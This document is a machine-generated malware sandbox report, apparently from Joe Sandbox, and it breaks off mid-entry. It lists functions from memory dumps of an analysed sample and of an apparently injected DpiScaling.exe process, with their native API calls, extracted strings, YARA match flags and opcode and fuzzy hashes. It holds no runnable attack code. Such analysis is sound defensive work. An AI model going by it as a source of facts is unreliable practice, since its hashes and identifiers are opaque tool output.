String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 01328441b18321590dc9a45f4591721960d635f777c1cd90b799838d9daa670b
Instruction ID: 321849633cfeaaa6104f575f7c995d35dc6b52135d84f052f99b0112f99bea31
Opcode Fuzzy Hash: 01328441b18321590dc9a45f4591721960d635f777c1cd90b799838d9daa670b
Instruction Fuzzy Hash: 3C410271700202AFD721CFA9CD41F6AB7A5FB94B10F10061DFA5AAB280DB30F8568BD1

Function 01A72300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A7238D
___swprintf_l.LIBCMT ref: 01A723B3

Strings

]:%u, xrefs: 01A723AA
%%%u, xrefs: 01A72384

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 59c53199998cb86e126a3701b2ebc86fb1f2ffda866053d9484c5ace4c142ba3
Instruction ID: d6bb77e1c5bb1cee5d18388460ac23e4fd2360a9d484350ca1b5140f32194c62
Opcode Fuzzy Hash: 59c53199998cb86e126a3701b2ebc86fb1f2ffda866053d9484c5ace4c142ba3
Instruction Fuzzy Hash: 4D319372A002199FDB20DF2DDD40BEEB7F8FF54610F44455AE949E3240EB30AB448BA0

Function 01A07D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A07E8B

Strings

+, xrefs: 01A07DE8
-, xrefs: 01A07DDD

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 415167690a4b68f5e0e6cb0a09056a60b43caef496bb5da04675d4b2ab1bb369
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 5491B2B1E002169BEF26DFADE8806BEBBB5AF44320F54451EE995E72C0D734AD40CB51

Function 019C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 019C9175
$, xrefs: 019C9191

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 1b52e26e3dba0dde6853e3bb802a36e964c6b3e8b1759b1f582232af408b0354
Instruction ID: 79ecee8af4586b4101e0e72824e0f786931a1bfa7916fc84086cdaad4b079968
Opcode Fuzzy Hash: 1b52e26e3dba0dde6853e3bb802a36e964c6b3e8b1759b1f582232af408b0354
Instruction Fuzzy Hash: 07812B76D002699BDB31CB58CC45BEABBB8AB48714F0441EAEA0DB7240D7705E85CFA1

Function 01A4CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 01A4CFBD

Strings

@, xrefs: 01A4CF0A
@4Qw@4Qw, xrefs: 01A4CFD5, 01A4CFDA, 01A4CFF1

Memory Dump Source

Source File: 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1990000_SLq0ulC3Wf.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: 681b661876d3bf33a61296d98201e16341f92bd75f080bd65c7424eac5e0c4b8
Instruction ID: 1b8314ec3469a3c592fcdf243b30aafc78b0ab9dd9be618493afeb75866a033c
Opcode Fuzzy Hash: 681b661876d3bf33a61296d98201e16341f92bd75f080bd65c7424eac5e0c4b8
Instruction Fuzzy Hash: F141D175900255EFCB21DFE9C880AADBBF8FFA4B10F00442AE90ADB265D734C901CB65

Analysis Process: DpiScaling.exePID: 8076, Parent PID: 3920COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	1.6%
Total number of Nodes:	436
Total number of Limit Nodes:	71

Executed Functions

Function 00689F00 Relevance: 50.5, Strings: 40, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 0068A318
}, xrefs: 0068A37A
E&, xrefs: 00689F53
W+, xrefs: 0068A2DF
g/, xrefs: 0068A0FB
-Y, xrefs: 0068A119
,}, xrefs: 0068A254
Ei, xrefs: 00689F3F
L6, xrefs: 0068A191
S>, xrefs: 0068A1A5
sP, xrefs: 0068A123
DN, xrefs: 00689F2E
hh, xrefs: 0068A10F
(, xrefs: 0068A2A0
!, xrefs: 0068A370
D[,}, xrefs: 0068A791
<, xrefs: 0068A2F0
A, xrefs: 0068A204
R, xrefs: 00689F75
aK, xrefs: 0068A28B
Y, xrefs: 0068A0B5
5?, xrefs: 00689F1A
w+, xrefs: 0068A284
v, xrefs: 00689F89
fw, xrefs: 0068A20E
&3, xrefs: 0068A15F
y, xrefs: 0068A0BF
E&, xrefs: 0068A484
(Y, xrefs: 0068A218
Y~, xrefs: 0068A33F
XK, xrefs: 0068A187
|?, xrefs: 0068A1DC
B, xrefs: 0068A04F
P0, xrefs: 00689FD3
lK, xrefs: 0068A077
]>, xrefs: 00689FE7
+, xrefs: 0068A097
nT, xrefs: 0068A1F0
@, xrefs: 00689F6B
_, xrefs: 0068A55A

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID:
String ID: ($!$&3$(Y$+$,}$-Y$2$5?$<$@$B$DN$D[,}$E&$E&$Ei$L6$P0$R$S>$W+$XK$Y$Y~$]>$_$aK$fw$g/$hh$lK$nT$sP$v$w+$y$|?$}$A
API String ID: 0-1358121024
Opcode ID: 32daf277ceb4f38e8fec63217f8841d690031708881976ed15925eb53616221d
Instruction ID: 70cb3b5ff0c63fc4e49a55413cf2093bcf79a77178593dba623875d1eaf9524c
Opcode Fuzzy Hash: 32daf277ceb4f38e8fec63217f8841d690031708881976ed15925eb53616221d
Instruction Fuzzy Hash: 125292B0D05228CBEB64DF44C8987DDBBB2BB48318F2081DAC5496B281CBB95ED5DF45

Function 0069CE10 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0069CEF4
FindNextFileW.KERNELBASE(?,00000010), ref: 0069CF2F
FindClose.KERNELBASE(?), ref: 0069CF3A

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: e0fff48d01ca83a299e8f92a1ed416015e5db7c8ed10122551668788acc4a79d
Instruction ID: 8e16172b0f5516679bec61f3646bdc3ebc190427684470dd0581ad061582638a
Opcode Fuzzy Hash: e0fff48d01ca83a299e8f92a1ed416015e5db7c8ed10122551668788acc4a79d
Instruction Fuzzy Hash: 9731CFB1900348BBEB60EB64CC85FFB77BEEF44714F10455CB909A6181DA70AE858BA4

Function 006A9970 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 006A9A6E

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 64c9850bb793b10e7cc8d0b17c17a9476126b1746f6ceaab4ac0b633fa197d51
Instruction ID: 460cf24bb886787f004ff11fb884bd1331c2118b852178dfd38b424f4ca4bf13
Opcode Fuzzy Hash: 64c9850bb793b10e7cc8d0b17c17a9476126b1746f6ceaab4ac0b633fa197d51
Instruction Fuzzy Hash: 8A31C2B5A01248AFCB54DF98D881EEEB7B9EF8C310F108219F908A7340D730A951CFA5

Function 006A9AE0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 006A9BC3

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: feddcea98b26054401b45a151620d58f2786650cf690945770ff2e71ff95a2b8
Instruction ID: ce8d038555813db980f5ec7e5bc69a28600e694f1b2fed6077409d2d781fff82
Opcode Fuzzy Hash: feddcea98b26054401b45a151620d58f2786650cf690945770ff2e71ff95a2b8
Instruction Fuzzy Hash: 9231E7B5A00648AFCB14DF98D881EDFB7B9EF89710F108219F918A7345D770A911CFA5

Function 006A9DD0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(006925DB,?,006A875F,00000000,00000004,00003000,?,?,?,?,?,006A875F,006925DB,?,006ABCDE,006A875F), ref: 006A9E95

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: de83c7eb32e2ab8c89bc27249108c7080b41080b659b2d7ef2c1fa28d8a8457f
Instruction ID: 2828f9be377946a9564a4218100b9cb1b1767fcf0e6e72001b231a38b3e7f493
Opcode Fuzzy Hash: de83c7eb32e2ab8c89bc27249108c7080b41080b659b2d7ef2c1fa28d8a8457f
Instruction Fuzzy Hash: D6210FB5900248AFDB10DF94C881EDFB7B9EF89710F108119F90897245D774A911CBA5

Function 006A9BD0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 006A9C63

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 54dc64f1ed53cf9ba746f52edff0ee2b1e71aaf563035d823c299c140d5a0b69
Instruction ID: c8550dc82ae0813c987dcb2e6db6917d6d07bbda08092aeed6fd3b9f2478b89f
Opcode Fuzzy Hash: 54dc64f1ed53cf9ba746f52edff0ee2b1e71aaf563035d823c299c140d5a0b69
Instruction Fuzzy Hash: 41115E71A00644BFD610FB94CC42FABB7ADDF86710F508209FA08AB281D7757915CBA5

Function 006A9C70 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 006A9CA7

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction ID: b2378d070548b0f3aba429f61ee0b21191c7846f01b8ee0bcfe72cc1dbf61eab
Opcode Fuzzy Hash: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction Fuzzy Hash: 20E0463A2003047BC220BA5ACC41F9B77AEEBC6720F008159FA08AB242CA71B91187F5

Function 04774650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477465A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a963d2bffe4cff2b8a30fb46fc8f534778ae7dbc743d170439a687c61ded30bd
Instruction ID: e01953079244a6500cf8c744c7e9777f837c8a9fe5c696e69f40b807ed4d882b
Opcode Fuzzy Hash: a963d2bffe4cff2b8a30fb46fc8f534778ae7dbc743d170439a687c61ded30bd
Instruction Fuzzy Hash: F09002716415004261507258484440660069BE13153D6C129A0555574C8618D955926B

Function 04774340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477434A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f8b77dd4645e66dc2147acf59bb3dfd648638fa6202b5f5abf9954106b32daec
Instruction ID: 29b3b6171c3875077fe802d58d9f60f059253aac61e1a90f82a53126f6216ec7
Opcode Fuzzy Hash: f8b77dd4645e66dc2147acf59bb3dfd648638fa6202b5f5abf9954106b32daec
Instruction Fuzzy Hash: 8590023164580012B150725848C454640069BE0315B96C025E0425578C8A14DA565363

Function 04772C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772C7A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d84a38449124313fde059e01b24fb421254072642d9c03d99383337b328f65b2
Instruction ID: f32036b640dfb766672d8d13c54ec12ffef94f770b2fd8b4c5b642684bf58235
Opcode Fuzzy Hash: d84a38449124313fde059e01b24fb421254072642d9c03d99383337b328f65b2
Instruction Fuzzy Hash: 7590023124148802F1207258844474A00068BD0315F9AC425A442567CD8695D9917123

Function 04772C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772C6A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99e758a5d14a7761210f810b9c2ef5ea599572f8f06e0943e32f09669221dade
Instruction ID: c18bbb95412bac505ab5d130ff50ce3e4682ea351fa57d187ea5cbcfb531ec08
Opcode Fuzzy Hash: 99e758a5d14a7761210f810b9c2ef5ea599572f8f06e0943e32f09669221dade
Instruction Fuzzy Hash: 8190023124140842F11072584444B4600068BE0315F96C02AA0125678D8615D9517523

Function 04772CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772CAA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ecc3f9529d760f22ea34608cdb8f96d98d00fd411cdc963cf6ca73443a8783f7
Instruction ID: df5820653f5ef3e196cca466170a34bc73fa1459034de5f919091bee01355068
Opcode Fuzzy Hash: ecc3f9529d760f22ea34608cdb8f96d98d00fd411cdc963cf6ca73443a8783f7
Instruction Fuzzy Hash: 2290023124140402F1107698544864600068BE0315F96D025A5025579EC665D9916133

Function 04772D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772D3A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a25130a4427827c55c521e713ab99ab5b2d97f4f58bacb636832f574c0c3541b
Instruction ID: 2391f4f3ca0137308aa609562947a265b223af231951acb84ff1cbced8fb809d
Opcode Fuzzy Hash: a25130a4427827c55c521e713ab99ab5b2d97f4f58bacb636832f574c0c3541b
Instruction Fuzzy Hash: 2E90023134140003F150725854586064006DBE1315F96D025E0415578CD915D9565223

Function 04772D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772D1A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8aa4c731caf24009a305a03cd0c23c2be2ba2ff4bf0fb64160af81e384fb29dd
Instruction ID: b6b3076f1c162ca80a751427025fc4c731bbc81fae42094c371fe34b0aba3bf2
Opcode Fuzzy Hash: 8aa4c731caf24009a305a03cd0c23c2be2ba2ff4bf0fb64160af81e384fb29dd
Instruction Fuzzy Hash: 3790023925340002F1907258544860A00068BD1316FD6D429A001657CCC915D9695323

Function 04772DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772DFA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cdae8cb219ac2aa6cf5a8e51c2dcce2f3884f002077ff214e8fd23e8b68a5cd
Instruction ID: ab09e061c74b4e6de306050d7a31e7d3eccc71a98bfbc82eed448dcdcc11f590
Opcode Fuzzy Hash: 6cdae8cb219ac2aa6cf5a8e51c2dcce2f3884f002077ff214e8fd23e8b68a5cd
Instruction Fuzzy Hash: EE90023124140413F12172584544707000A8BD0355FD6C426A042557CD9656DA52A123

Function 04772DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772DDA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26ae5af8bc647793ab9dceb72feff5555953dc54168ea493f6c983821e94bec6
Instruction ID: 58af3f712464e2b41a9f46226bb51f6a1c5cad69f953bde55c161c5747840d89
Opcode Fuzzy Hash: 26ae5af8bc647793ab9dceb72feff5555953dc54168ea493f6c983821e94bec6
Instruction Fuzzy Hash: 9F900231282441527555B258444450740079BE03557D6C026A1415974C8526E956D623

Function 04772EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772EEA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7549b2fb22d4cd2ff5a1136766cedd9905090f7627b627788d244de469e85a3
Instruction ID: 388653147d71109ab4b7326e13181615b64751edcb9f26413420f707707cb02b
Opcode Fuzzy Hash: d7549b2fb22d4cd2ff5a1136766cedd9905090f7627b627788d244de469e85a3
Instruction Fuzzy Hash: 8B90027124180403F1507658484460700068BD0316F96C025A2065579E8A29DD516137

Function 04772E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772E8A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3bde2c9c93916afaf1d5a486ee28171ff3541797e303875c742722987ff0a11
Instruction ID: a44a8ff847a2216f8281e08c5e2a1d6ad310af668a8011b49d0f9bc548111800
Opcode Fuzzy Hash: e3bde2c9c93916afaf1d5a486ee28171ff3541797e303875c742722987ff0a11
Instruction Fuzzy Hash: 7290023164140502F11172584444616000B8BD0355FD6C036A1025579ECA25DA92A133

Function 04772F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772F3A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2802c8bacad85a5f3eb7b55dfb6bc4f5bebf94c4bd6d4e9edfb9b3e55a6b1971
Instruction ID: c62b4662722f11d9e1aa36e0001883055a0ac0c1445185773fb1c09608b2092d
Opcode Fuzzy Hash: 2802c8bacad85a5f3eb7b55dfb6bc4f5bebf94c4bd6d4e9edfb9b3e55a6b1971
Instruction Fuzzy Hash: D290027138140442F11072584454B060006CBE1315F96C029E1065578D8619DD526127

Function 04772FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772FEA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 570a549421d68810b4d46eeab8341c59640d412494fc1c6370e50c5229626da1
Instruction ID: 4f0599f5e40e649a42d2b6594befb87062c2d50310dca02e8703bf62e59ca0ce
Opcode Fuzzy Hash: 570a549421d68810b4d46eeab8341c59640d412494fc1c6370e50c5229626da1
Instruction Fuzzy Hash: 05900231251C0042F21076684C54B0700068BD0317F96C129A0155578CC915D9615523

Function 04772FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772FBA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae0915daecbceda424d88146a5653f064710548c3f8bdd340021f45ec460cd5b
Instruction ID: 5443a24757e87a48b3924152e56ecc176651757a97d6a038682d8cb09bbc8f72
Opcode Fuzzy Hash: ae0915daecbceda424d88146a5653f064710548c3f8bdd340021f45ec460cd5b
Instruction Fuzzy Hash: 7C900231641400426150726888849064006AFE1325796C135A0999574D8559D9655667

Function 04772AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

